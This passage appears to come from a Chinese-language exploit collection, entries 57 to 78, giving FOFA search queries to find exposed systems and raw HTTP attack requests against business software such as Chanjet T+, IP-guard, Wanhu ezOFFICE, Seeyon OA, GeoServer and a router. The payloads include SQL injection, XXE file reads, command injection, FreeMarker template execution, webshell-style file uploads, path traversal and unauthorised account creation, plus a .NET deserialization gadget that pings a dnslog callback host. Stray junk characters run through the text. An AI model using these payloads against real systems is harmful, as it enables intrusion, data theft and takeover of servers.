: I7 ?# M/ o6 T6 \+ K i. b
{
7 r/ E6 U) D( I% ~, _$ R/ ~6 x "storeID":{
- ^ X0 N5 f6 D" C2 u' u. h6 h8 k "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
9 s3 ^. b. G6 ?# z: O$ m "MethodName":"Start",
# D/ r4 Y" l0 f: N% [/ f "ObjectInstance":{
' O& Q# o5 E1 T' I8 I' x "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 m7 b: K- s. S6 b
"StartInfo": {
- {* d' d, }5 m6 r "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 ^8 ~9 K. u9 \* Y5 g "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"4 w5 }5 H5 v; f+ l. ^% j8 [8 d
}
8 I$ p' G/ h& o8 E }) F( z& h8 a) r! H0 f# S
}1 s( G: l6 a" Q6 H" D' ?$ b
}3 V A, Y" y" F) B- C# ]4 Q6 ?" j: x
6 U0 ^$ d. ~$ S! ~: n$ B
' z6 e- B+ h2 ]57. 畅捷通T+ keyEdit.aspx SQL注入9 s" ~' I% R. R* |
FOFA:app="畅捷通-TPlus"
& d1 l0 K6 c; n* d% F! u: JGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1% |7 U6 V& n* \" Y
Host: host2 K* m* R0 r% ?3 P) J5 U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ d1 X& O4 w' q7 e8 H( cAccept-Charset: utf-85 C$ i* m% q' K# ?( r7 b+ k7 u
Accept-Encoding: gzip, deflate! \0 f* ? C9 H8 M* w" u) z( m1 j
Connection: close+ y/ k8 e; I6 }
; j& L3 p& C; d) O1 P% h; o" s
c3 V% o) I3 j
58. 畅捷通T+ KeyInfoList.aspx sql注入
( m3 P1 R4 F+ z/ b9 g. nFOFA:app="畅捷通-TPlus"& ?% Q) a" U* C+ p9 N3 ^* C
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1; f" T( ]! m/ T; L; {$ `; v
Host: your-ip/ i& _: T6 x8 Q" {& Q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
& F( ^ I3 q" qAccept-Charset: utf-8
% ~6 }+ L/ S" ?* P: LAccept-Encoding: gzip, deflate$ [- P$ W' A/ i% S: X8 S0 Y1 \
Connection: close0 x, j3 _0 J( G5 p
, y- @" G7 G2 m9 J5 j' B
E X- I7 H. A4 v- a0 g2 f" v
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行, Q( E" E$ w" F- I/ b( n/ D) Y
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"% A8 M s! Y, {' e. r: W
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
6 _' l: @' ~; A0 K% I8 wHost: 192.168.86.128:9090# j& @6 f4 g. y/ @. @
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 i# }$ k9 Q" R
Connection: close' t g4 F9 v' A( j1 ~0 {( s
Content-Length: 1669
+ |5 D2 `; h3 WAccept: */*" i* n3 W4 Z. J" I* H& x( P, M
Accept-Language: en
2 A/ E9 Z5 A' }/ b0 v- M, e8 d0 WContent-Type: application/x-www-form-urlencoded. X% c. g' N% w- \ q1 F# V
Accept-Encoding: gzip
4 l9 n2 ?. p7 ?, ~9 l( M) }& G! O3 {9 n8 J, a) d, r; W; c7 T
PAYLOAD+ u9 m! P7 s$ o/ B5 j
$ E/ g1 M$ z; `& m8 z& X9 T: ?
6 T5 ]& @" [0 g- O" d, K/ `& J
60. 百卓Smart管理平台 importexport.php SQL注入! s+ A) D# M9 U1 H. e1 Q
FOFA:title="Smart管理平台"' B1 Z) @. B9 W1 S
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
D2 z) j; g9 v4 iHost:' J9 v9 z2 c+ f; B5 k) R9 f/ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 o s& ~& B( J* f, m: q2 I2 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 \: n% k4 Q$ j, I# Z0 AAccept-Encoding: gzip, deflate
( k S) o: V% m1 H7 a: rAccept-Language: zh-CN,zh;q=0.9
3 ]: s1 ^" a' F* u2 d# z' SConnection: close2 p, T/ n/ @" W; s2 ?- ^+ Q
8 W4 w/ }$ ]/ @/ l- J7 v8 C& \* a
; N, r: v. H% C) i5 J6 N61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
+ P8 R% I' u% jFOFA: title="欢迎使用浙大恩特客户资源管理系统"
2 U( ?: n0 D, r; w9 @* T! ^POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1# J% n' D2 S. M% h9 G% o
Host: x.x.x.x0 N! g6 R& y- a9 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% S8 q, i3 |' ?& n- n' L7 X) q
Connection: close
$ _0 b) u$ s/ }1 ^- LContent-Length: 27
+ Y" _3 Z- J! N8 E! FAccept: */** K7 H% }& e8 z- ]
Accept-Encoding: gzip, deflate# N% R3 p$ H% R1 W* T
Accept-Language: en5 Y/ \! U% e" s* b
Content-Type: application/x-www-form-urlencoded
% _! F% ^" p w% z Y
[ m3 E; k5 B) J) }" b1 x8uxssX66eqrqtKObcVa0kid98xa6 u( x5 h. v L9 r% ~. f8 R" C
% D+ _8 g8 K% N5 M
8 C2 u/ s6 o0 ~$ s0 y$ k( b. E
62. IP-guard WebServer 远程命令执行
5 K& h7 R( ~# {" b5 ?5 TFOFA:"IP-guard" && icon_hash="2030860561"
$ _! E3 I F! xGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
& ?. c( e( D( z" \Host: x.x.x.x
" I) W0 q N6 l2 Q1 cUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
# r' k/ q' X4 n; mConnection: close
9 i1 T/ v9 y- Q9 s1 z* w+ jAccept: */*$ r8 f: h! C$ B7 \
Accept-Language: en$ y. @( R% A/ o
Accept-Encoding: gzip. } F9 n* _, l7 n$ [5 v3 b
) j) L7 \0 c8 l8 h0 k7 f5 k/ H1 P8 t/ T, r2 P
访问. Y6 B5 q- T3 R
0 a. `2 l# |+ N& T" G& y$ I8 B, X
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
* f% n: s |! d* jHost: x.x.x.x
) I' S4 k8 }3 Y7 y1 G/ X9 W
. n) |$ g6 K `# J' ?" ~5 A! y. {& J' |
63. IP-guard WebServer任意文件读取 ?/ v8 ?7 r O
IP-guard < 4.82.0609.0
- t; P4 k: f. X1 b, e% K0 cFOFA:icon_hash="2030860561"
, j, s2 L& M# C6 _POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
- `3 P. v; _% t4 f, J: fHost: your-ip
! n! x7 f& M3 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
6 H& B& G6 t- A% LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 M8 f# C) b3 g8 r. V; \+ \, dAccept-Encoding: gzip, deflate8 `' A1 z9 A' m5 e7 Q! z
Accept-Language: zh-CN,zh;q=0.9( B" S8 P, r8 h% E
Connection: close+ B' x7 r2 d k( @5 y0 t
Content-Type: application/x-www-form-urlencoded" _& V! ~; ~2 S! t9 Z# t1 f5 E
; ?; q% b; ~5 }5 h$ G. {
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
! F- ^8 O6 v% x- W2 [- r$ g& x5 h& T+ p- f3 J
64. 捷诚管理信息系统CWSFinanceCommon SQL注入1 O& `1 c& |" G( z$ G5 ^/ T- k
FOFA:body="/Scripts/EnjoyMsg.js"
w6 {$ O' J+ m: M: ^& e+ XPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
/ Y6 @0 _& S7 O" _Host: 192.168.86.128:9001! o: r+ \' J6 k0 J
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
# z* x `# Q9 m0 d% d$ IConnection: close! E- c* k( ^5 ?9 L6 h( N! s
Content-Length: 369
8 R1 g8 l- T3 oAccept: */*
% N1 N0 l9 o; @/ i, S$ RAccept-Language: en' J: y1 q; S- f: e$ G
Content-Type: text/xml; charset=utf-8% `* }' x+ f, s
Accept-Encoding: gzip
9 W! O. L# k0 Y' T! V9 E
x, Y+ p8 G) h8 O% C) O, ?5 o<?xml version="1.0" encoding="utf-8"?>
; Y, b" c& _5 G<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# [2 A$ a4 l" a2 m& R4 B<soap:Body>
+ h; X. _6 c3 ^" [$ G4 z <GetOSpById xmlns="http://tempuri.org/">
& @4 s4 V6 b% ]+ B <sId>1';waitfor delay '0:0:5'--+</sId>
0 T& x" F+ r/ u </GetOSpById>
- b4 D! C [- Q </soap:Body>; ?; ^; M% ]5 T8 ?7 A! C
</soap:Envelope>
! D3 N" Y6 e, \' |/ G' l9 K: l* e' x
# K/ C; [& l7 d0 G# |& Z
' @9 }7 Z1 X8 f- _9 X* {65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过: Z2 J. R" T5 P# C
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
+ a* D# {( x4 ?% N" _* } w3 R响应200即成功创建账号test123456/123456
! e+ B3 y; i# M1 @9 `8 z! xPOST /SystemMng.ashx HTTP/1.1
% X6 l: z' y1 C7 p+ P/ NHost:
, V. [- Y: R7 y% OUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
$ t! I3 F% z7 _. l5 @Accept-Encoding: gzip, deflate7 d6 Z: W5 ?& \" T* D) M
Accept: */*
, i0 L; q- w$ _/ b$ _$ \. R$ j# ]Connection: close
9 X- w# W/ J) F7 t5 m( f( QAccept-Language: en
: M1 k) `4 }* K% d. v8 w0 G8 VContent-Length: 174
4 W3 c8 W5 s& k$ j% F' t
* L0 ?5 g g+ \* S1 n0 N" ?operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators" i) ~7 V. Y* m9 F) `/ ^
9 ~7 O) c& b9 r& J5 }2 a0 }$ e, b# F
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 S5 f# c6 F/ y7 c! I8 `3 VFOFA:app="万户ezOFFICE协同管理平台"# Y* @% U1 g9 |6 T7 G
2 p! g; C: K% D% j2 Z3 ^, j: M/ }7 A: Q3 Y1 a
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.10 [- H1 S+ o" I6 I4 l5 W% {2 T
Host: x.x.x.x t4 ]& d+ A6 f3 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 b/ t. ^& B0 k8 W
Connection: close8 D4 [9 d) p' ? r D; y5 v
Accept: */*
2 I4 y1 z) J% [Accept-Language: en
' S- q1 T+ f3 h8 d9 X( `% P4 k" fAccept-Encoding: gzip& v% i D- ^4 J7 U1 t
- v7 p6 H4 l# T& g* B1 c. L; C/ d5 ?
" [2 Y; P+ E$ t$ Z第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
, T; b8 A+ P. ^3 c& [+ U. B; g+ X! ?' A1 B! E
67. 万户ezOFFICE wpsservlet任意文件上传6 y& q, j1 I6 G; o8 Q6 X
FOFA:app="万户网络-ezOFFICE"; o8 J$ p1 D. H
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
$ Q& o0 p7 T% B- j4 d! [ CPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1( r: z1 e) \7 Q0 G1 k1 `8 j
Host: x.x.x.x
U* v7 L" _3 f# m1 c8 j; ?User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
$ e8 R9 j& U( ]! G& lContent-Length: 173
2 x. \8 T" d7 \. ~( D) f) fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/ F5 c- j# f7 `
Accept-Encoding: gzip, deflate
/ c0 j E4 F. ~" H1 EAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
$ p$ o) z6 Z, ]( X/ V0 CConnection: close9 O6 m4 d& M1 Z( Z' }0 ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp% c9 n9 q8 Q# |2 ~, e2 N- Z
DNT: 1& Q5 L i: M8 s; ?
Upgrade-Insecure-Requests: 1% e) G3 O0 O6 P: c( s2 N G9 G0 F
0 d8 c, ?# i- X--ufuadpxathqvxfqnuyuqaozvseiueerp
* P$ x* H2 a0 _Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"* H" V( H/ Z1 d9 ?2 ~' V- \
8 k n) w& H% u) s8 S6 O' d7 |9 X0 { n
<% out.print("sasdfghjkj");%>9 ~( |" ? @/ {$ c- q
--ufuadpxathqvxfqnuyuqaozvseiueerp--
Z8 v7 E' _ S; u. |1 M6 ~) d. L3 |; V5 N. e
/ Q9 a$ I& Y2 r5 Z8 F2 O) o" I: A
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
6 Z: D) A( s- d$ M: s6 y( A6 v' {. B3 P. k
68. 万户ezOFFICE wf_printnum.jsp SQL注入3 V3 U* G& e+ ^1 c& X
FOFA:app="万户ezOFFICE协同管理平台"% A4 _2 `# M! r# ^4 W3 [; l
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
; u& u" V1 e2 [8 c& a) uHost: {{host}}
. p% G3 Z( ?- ~$ A2 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
2 _- y* N; K. Z* A% x* v5 L/ jAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. M+ I2 `/ N( W. s0 J- Z- `7 {Accept-Encoding: gzip, deflate
4 i' |6 k+ z, Y! u" ]Accept-Language: zh-CN,zh;q=0.9
* h8 C1 |0 ^. oConnection: close- [# _% B; ~ i
$ B$ X5 `/ u1 m: r% u) l6 K' m3 y
0 `4 r) }2 l4 H! R3 c, Z9 S1 q69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 f3 i" V+ X, K2 z) ]FOFA:app="万户ezOFFICE协同管理平台"
) \3 R$ T7 k5 P2 EGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1' D* _# J' L. I2 a8 U8 M! ?
Host: your-ip
" h: V0 i. G2 j0 |/ y1 Z; |User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 n. ^3 H4 u/ Z4 z4 s" ~9 c" E
Accept-Encoding: gzip, deflate
( M2 Y1 M9 d! O. C: ?6 m' f8 C1 jAccept: */*
% ~6 ]. X6 z' d' y( X1 sConnection: keep-alive
& o7 U, k3 p: X+ e1 n$ j! `% Z. U1 F* B* l' M
4 |9 u# |3 T' ^( V+ ^+ u3 z# w' x7 m
70. 万户ezEIP success 命令执行
) g$ B5 Z: {+ v* Z3 k! zFOFA:app="万户网络-ezEIP"3 w5 u6 `% m3 G+ X
POST /member/success.aspx HTTP/1.1
7 t! A6 `, J# t+ s aHost: {{Hostname}}3 y% V f/ \ v) _! {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( l4 p. t& Y _! | k2 N
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
. r! v0 \: N# q7 e" ]8 [Content-Type: application/x-www-form-urlencoded! v) a0 [4 v" L# c* f8 ^3 N
TYPE: C" t; O! E! q, I5 `
Content-Length: 167021 O" A5 n( w" A) i& T6 O
! E( L) d1 _( P2 |" N
__VIEWSTATE=PAYLOAD! `, I3 _& B9 S
$ s% P8 F( O, a, r1 f! [' K S" R% D% [3 r0 C! G
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
7 O) X+ {& ]3 T" X& v6 ], N& dFOFA:body="PM2项目管理系统BS版增强工具.zip"4 U* V/ c: g7 F8 N+ R0 c( `
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ u* s# n: N" M/ v$ `
Host: x.x.x.xx.x.x.x
- R/ G) e& X& L1 [3 L- YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& R/ K/ E& Y4 q' m* lConnection: close
% X; y7 r! D! O3 s) j% X2 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 x( E4 v, a0 k
Accept-Encoding: gzip, deflate( j& Z+ t% F* [; J# f$ n; R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ B4 g N+ V0 O
Upgrade-Insecure-Requests: 15 t1 t# ]; A% b3 F1 i' w
/ m F$ C# V2 O- u0 P% A
n5 i3 E' y+ S, c72. 致远OA getAjaxDataServlet XXE4 q. |+ m1 X( b0 C0 P
FOFA:app="致远互联-OA"# e) T* o7 `* J) [' Z
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ w& p% }8 ~5 N4 c
Host: 192.168.40.131:8099 `! h, w# M# f8 L
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 J% F- G: k( E/ ?! A/ w) e. yConnection: close
% a3 W; s- w# i, q% rContent-Length: 583
) [2 S+ [8 M) u- x* BContent-Type: application/x-www-form-urlencoded
* e2 m4 |0 ~/ q# J0 \Accept-Encoding: gzip
/ W/ G- C7 Q' p; i8 T" @
2 Y# Q# C' \2 K9 |1 O, GS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E# t* I3 I- e: H4 B
( O7 ?: ^. I& D
5 {" }& E5 m2 ]3 _. ]! J/ v
73. GeoServer wms远程代码执行) j3 K5 G7 W8 S7 |) J0 h& j
FOFA:icon_hash=”97540678”$ G8 _6 d) \+ D; U9 Z$ N( d
POST /geoserver/wms HTTP/1.1
6 E3 J P- T& z' VHost:
3 ^. f% p, G! W6 i5 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- L) O* I, Q, n' P) E
Content-Length: 1981$ u+ @- x; e F! Q
Accept-Encoding: gzip, deflate
; V- i& e! \/ w: W* MConnection: close# X4 g( |4 ^2 d- V4 r
Content-Type: application/xml
9 a7 n* n& J2 B$ e$ N2 ySL-CE-SUID: 3
5 ?/ V' o* j9 d, L
7 y, @' [4 j0 v! ?, f) ?$ iPAYLOAD* I% y1 @7 Q' D8 F/ p
9 t5 n' V2 h" C1 m* F7 @7 g' m5 E9 N4 a, k' k% J. }
74. 致远M3-server 6_1sp1 反序列化RCE* A9 }/ O8 b8 ]
FOFA:title="M3-Server"
5 l8 A+ B5 Z, d( F& ^$ x% SPAYLOAD
% r2 M& k9 u* t. n: F5 r( Q W+ F
2 x6 s# E$ B4 y" ^5 F3 W) E0 P75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" b$ ]) G" m. w$ U- ~+ m! p
FOFA:app="TELESQUARE-TLR-2005KSH"
) U. o0 M7 F) n0 Z# j+ _% {# eGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
3 b8 F% ^5 M5 t7 i5 gHost: x.x.x.x5 S7 i4 h4 z6 s9 E2 g2 [4 ^* m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, v3 U: k9 E( S: x1 ~Connection: close3 B/ R R( G( g
Accept: */** \0 C, c1 f. t( O4 T8 a
Accept-Language: en
; K8 R: r# a" W1 ^7 H' LAccept-Encoding: gzip
- u1 D' G3 e' {: ]& T- F) ?8 p/ W* c0 ~6 |# J1 W1 C1 r( B H6 g+ [
6 E a% z1 H/ J# G
GET /cgi-bin/test28256.txt HTTP/1.10 n+ h3 s. N! \2 h
Host: x.x.x.x
( b3 g; Z0 ?: z8 H- u2 z$ \
# f8 _5 c: m! A( S5 c3 t
7 i$ X l4 B& O/ j. J7 a76. 新开普掌上校园服务管理平台service.action远程命令执行1 K# d" a" p4 Q$ g
FOFA:title="掌上校园服务管理平台"
7 y" P+ l- X) ? F# VPOST /service_transport/service.action HTTP/1.1# @2 S+ O+ ? o' a( {9 l0 _
Host: x.x.x.x& P2 K5 j, k$ G, \6 ]6 f/ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0% ]+ Q/ _5 O8 i8 R" }3 g- N+ L
Connection: close
) Y* i5 T4 Z$ w$ t( a! w: n* V1 T DContent-Length: 211
9 W a% ^( e$ d# r1 M+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" S# j3 l# E; S8 @: n
Accept-Encoding: gzip, deflate
- W' v% d& |( Z, M7 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" H) |4 E- @* ECookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
6 Q5 J* y, v$ @9 p5 A4 C: FUpgrade-Insecure-Requests: 1
; D, u+ ~% }# o! y+ n
' h2 e- d! q9 }3 x; U{" L1 b1 f2 y; K. u5 K3 I# Z7 V
"command": "GetFZinfo",! \/ ]' J: d8 ]/ A
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
6 G3 J: \+ e2 h8 w& @- S ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"( a' w1 c% e8 V5 e; D/ B
}
T6 D% L8 E5 h9 `5 Z9 }3 |4 g$ t* b
# p$ ?5 e4 S# ~- Q3 J7 E1 bGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
9 y( V6 b- v, j1 [& nHost: x.x.x.x
- `/ o8 d( A( M6 i4 u% x G- a/ S4 E& v* ~' D( S4 L
! t1 }5 K7 v- f/ U
/ q* u8 m- Z; v W/ c3 ~
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
/ P: t* \) f6 N0 _: \- X3 ?; kFOFA:body="F22WEB登陆"
5 W+ D3 b8 X0 m( {POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.17 a2 |% f. ^1 N! n
Host: x.x.x.x
" @6 a& g7 q* ?8 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 o3 }/ e" s) }/ P; @% b/ BConnection: close
6 D6 a a5 ]% P: z0 J2 z; aContent-Length: 433" W0 x' Y; M* r- P8 j+ B: Y
Accept: */*
* W E2 u! ?/ R; tAccept-Encoding: gzip, deflate
3 Q$ n6 R3 I" B# l; yAccept-Language: zh-CN,zh;q=0.9$ q% H/ W- }& m
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
- O' g/ c' o, A+ n3 B3 ~6 {- j Y- ?7 O
------------398jnjVTTlDVXHlE7yYnfwBoix& S9 Z* J4 F# x; f. x. F, \( x
Content-Disposition: form-data; name="folder"+ u# ^" P% x/ [: U9 C
g; R/ T1 F9 s' W* U2 X- J& l6 X
/upload/udplog k% \ _5 C/ T7 c" h2 `
------------398jnjVTTlDVXHlE7yYnfwBoix8 q5 T) ~# _* w+ f
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
/ i" ~, g8 b3 a7 h- EContent-Type: application/octet-stream
: `. {) H5 Y0 o1 h/ ^% `" I3 W ~: [8 ] k+ f
hello1234567
. G! | k: D( ? ~0 G8 ]------------398jnjVTTlDVXHlE7yYnfwBoix
, E- N$ A8 M' B. z3 @3 g; bContent-Disposition: form-data; name="Upload"- w# J* o7 J% w! @5 i8 t
1 C) u. |* I* R- p
Submit Query
3 `' ?/ r& p) r9 S------------398jnjVTTlDVXHlE7yYnfwBoix--
: j- F3 P9 b2 X1 j) Y
) _7 f( t" @4 l' c) G9 W7 [; O D4 q
I1 w3 [! r# N! n! O78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
* G; w7 s5 j1 x; M% P+ a, sFOFA:icon_hash="2001627082"0 }/ {9 O& J( m$ N/ @; A
POST /Platform/System/FileUpload.ashx HTTP/1.1' l% p! F3 N" r
Host: x.x.x.x
" ?# W$ F, l- T4 D# CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. W) j1 i8 ]) ]& W! P0 u. fConnection: close( o! S- Z" ~! p0 {1 P
Content-Length: 336
& O" J( X' w" P }4 `, z0 L& P- zAccept-Encoding: gzip
- ~& P- Q$ }8 bContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
9 q6 m) f2 t# Y* u: O, u$ a9 |+ L2 _! W* j0 b
------YsOxWxSvj1KyZow1PTsh98fdu6l. X* u! |% Y. L* M' g( O+ I
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"4 E, g7 Q9 R9 ~( Y; \! L
Content-Type: image/png! G# U7 k- H A6 h* Q+ {+ G: Z
% N& U1 `) f) k7 XYsOxWxSvj1KyZow1PTsh98fdu6l5 {4 {0 H v% ^& l' I9 c6 ^
------YsOxWxSvj1KyZow1PTsh98fdu6l$ F. o# G6 m h" k0 S: s
Content-Disposition: form-data; name="target"
1 \, D9 g+ `: x& }& Z! W1 l% V
& x+ D/ H- N p0 ^3 m/Applications/SkillDevelopAndEHS/( {1 f- d% W6 M
------YsOxWxSvj1KyZow1PTsh98fdu6l--; f# H# t% M5 @! \+ R& j4 S
! b2 E% f/ Y; N1 }
